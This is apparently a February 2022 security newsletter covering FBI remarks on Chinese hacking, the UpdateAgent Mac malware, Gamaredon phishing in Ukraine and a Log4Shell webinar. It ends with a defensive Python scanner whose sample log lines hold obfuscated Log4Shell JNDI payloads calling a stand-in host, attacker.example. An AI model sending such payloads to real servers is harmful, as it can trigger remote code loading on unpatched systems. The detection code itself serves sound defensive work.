China Cyber Attacks, Log4Shell Webinar, Mac Malware, and Russia vs Ukraine
Friday, February 4th, 2022
Welcome to HackerHub
As per usual, welcome to another edition of Hacker News and enjoy this week’s curated list of articles. Found below, you’ll get some really awesome content that we put together and made specifically for you.
Finally, Hacker News is in the process of officially being rebranded as HackerHub. Pretty dope, right? Anywho, just be on the lookout for HackerHub instead of Hacker News in your inbox henceforth! Today the email is being sent from the Hacker News name, but next week it will be different.
Cheers!
William
General News of the Week
China Generates More Cyber Attacks Than Everywhere Else Combined
In a Monday speech titled Countering Threats Posed by the Chinese Government Inside the US, FBI Director Christopher Wray said the bureau has more than 2,000 open investigations into incidents assessed as attempts by China's government "to steal our information and technology."
"The Chinese government steals staggering volumes of information and causes deep, job-destroying damage across a wide range of industries – so much so that, as you heard, we're constantly opening new cases to counter their intelligence operations, about every 12 hours or so."
"They're not just hacking on a huge scale but causing indiscriminate damage to get to what they want. Like in the recent Microsoft Exchange hack, which compromised the networks of more than 10,000 American companies in a single campaign alone," he added.
Wray said China sometimes directs attacks through government-owned companies but does not have to rely on such entities, because businesses in China are required to maintain a Communist Party Committee composed of Party members who are placed in senior management positions. "Within China, they force US companies to partner with Chinese government-owned ones to do business in China, and then abuse and exploit those partnerships," Wray added.
Mac Malware is Now Dropping Adware… Getting More Dangerous
What malware are we talking about? UpdateAgent
The malware, which impersonates legitimate software, such as support agents and video software, first surfaced in September 2020. It is commonly distributed via drive-by downloads or pop-ups for advertisements and fake updates for tools like the long-discontinued Adobe Flash Player. Since it first emerged, UpdateAgent's authors have constantly updated it with significant new functionality.
Researchers from Microsoft analyzed the latest variant and found it contained an expanded capability for installing secondary payloads hosted on trusted public cloud infrastructures, such as Amazon S3 and CloudFront. Instead of using either .zip files or mountable disk images (DMG files) to fetch additional payloads like it had previously, the new version of UpdateAgent now can use both file types.
The October version of UpdateAgent (also tracked as WizardUpdate) is its fifth iteration. The first one, in September 2020, was simple: it collected basic information about the device on which it was installed and communicated with a remote command-and-control (C2) server. In the next few versions, the authors added features for fetching secondary payloads, maintaining persistence, and, importantly, bypassing Gatekeeper, the macOS mechanism that is supposed to ensure only trusted software runs on a Mac.
Russian Gamaredon Hackers Targeted 'Western Government Entity' in Ukraine
The Russia-linked Gamaredon hacking group attempted to compromise an unnamed Western government entity operating in Ukraine last month amidst ongoing geopolitical tensions between the two countries.
Palo Alto Networks' Unit 42 threat intelligence team, in a new report published on February 3, said that the phishing attack took place on January 19, adding that it "mapped out three large clusters of their infrastructure used to support different phishing and malware purposes."
Additionally, Unit 42 uncovered evidence of a Gamaredon campaign targeting the State Migration Service (SMS) of Ukraine on December 1, 2021, which used a Word document as a lure to install the open-source UltraVNC virtual network computing (VNC) software for maintaining remote access to infected computers.
Log4Shell Explanation Webinar - What is it??
Most security practitioners are now aware of the Log4Shell vulnerability (CVE-2021-44228) disclosed toward the end of 2021. The flaw itself dates back to the JNDI lookup feature added to Log4j 2 in 2013; how long attackers knew about it before public disclosure is unknown. The past couple of months have had security teams scrambling to patch Log4Shell in Apache Log4j, a widely used Java logging library. Beyond patching, it is helpful and instructive for security practitioners to have a deeper understanding of this critical vulnerability.
Fortunately, Cynet Senior Security Researcher Igor Lahav is hosting a webinar [Register here] to provide "buzzword free" insights into Log4Shell. Based on a webinar preview provided by Cynet, the discussion will cover the software bugs in Apache Log4j that permitted the critical vulnerability, the exploits used to take advantage of it, and the remediation options available to protect your organization. This webinar should help make sense of the sometimes overly technical analysis of Log4Shell we have been subjected to over the past couple of months.
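One thing the webinar discussion will need to cover is that the exploit string can be obfuscated with Log4j's own nested lookups, so a naive search for the literal text `${jndi:` misses many real attempts. The following is an added example (not code from the page, from Cynet, or from the Log4j project) that emulates the small set of lookups attackers used for obfuscation, normalises each line, and then checks for a JNDI lookup. The log lines and hostnames are constructed for the example; `lower`, `upper` and the `:-` default-value syntax behave as they do in Log4j 2, but every other lookup is left untouched rather than emulated.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in log lines.

Added example, not from the page or the Log4j project. It emulates only the
handful of Log4j lookups attackers used to obfuscate the ${jndi:...} trigger
(lower, upper, and the ":-" default-value form), normalises each line, and
flags any line whose normalised form still contains a JNDI lookup.
"""
import re
from typing import List, Optional, Tuple

# An innermost lookup: a ${...} whose body contains no further $, { or }.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation. Log4j matches the lookup name
# case-insensitively, so ${jNdi:...} is just as dangerous as ${jndi:...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample access-log lines (hypothetical hosts, not captured traffic).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:rmi://attacker.example/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/y}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]


def _resolve(body: str) -> str:
    """Resolve one innermost lookup for the subset of lookups emulated here."""
    name, _, arg = body.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    # ${lookup:key:-default}: a lookup that cannot be resolved yields its
    # default, so ${env:NOPE:-j} and the empty-name ${::-j} both become "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Anything else (jndi, date, ...) is left in place for the caller to inspect.
    return "${" + body + "}"


def deobfuscate(line: str, max_rounds: int = 10) -> str:
    """Repeatedly resolve innermost lookups until the line stops changing."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup."""
    m = _JNDI.search(deobfuscate(line))
    return m.group(1).lower() if m else None


def scan_lines(lines) -> List[Tuple[int, str, str]]:
    """Return (index, scheme, normalised_line) for every line that triggers."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme, deobfuscate(line)))
    return hits


if __name__ == "__main__":
    for idx, scheme, norm in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: jndi via {scheme}: {norm}")
```

Running the block flags the first three constructed lines (`ldap`, `rmi` and `dns`) and ignores the benign user agent and the harmless `${date:yyyy}` lookup. Detection like this is a triage aid, not a substitute for patching: it only sees the subset of obfuscations it emulates, and an attacker can use lookups this emulation leaves alone.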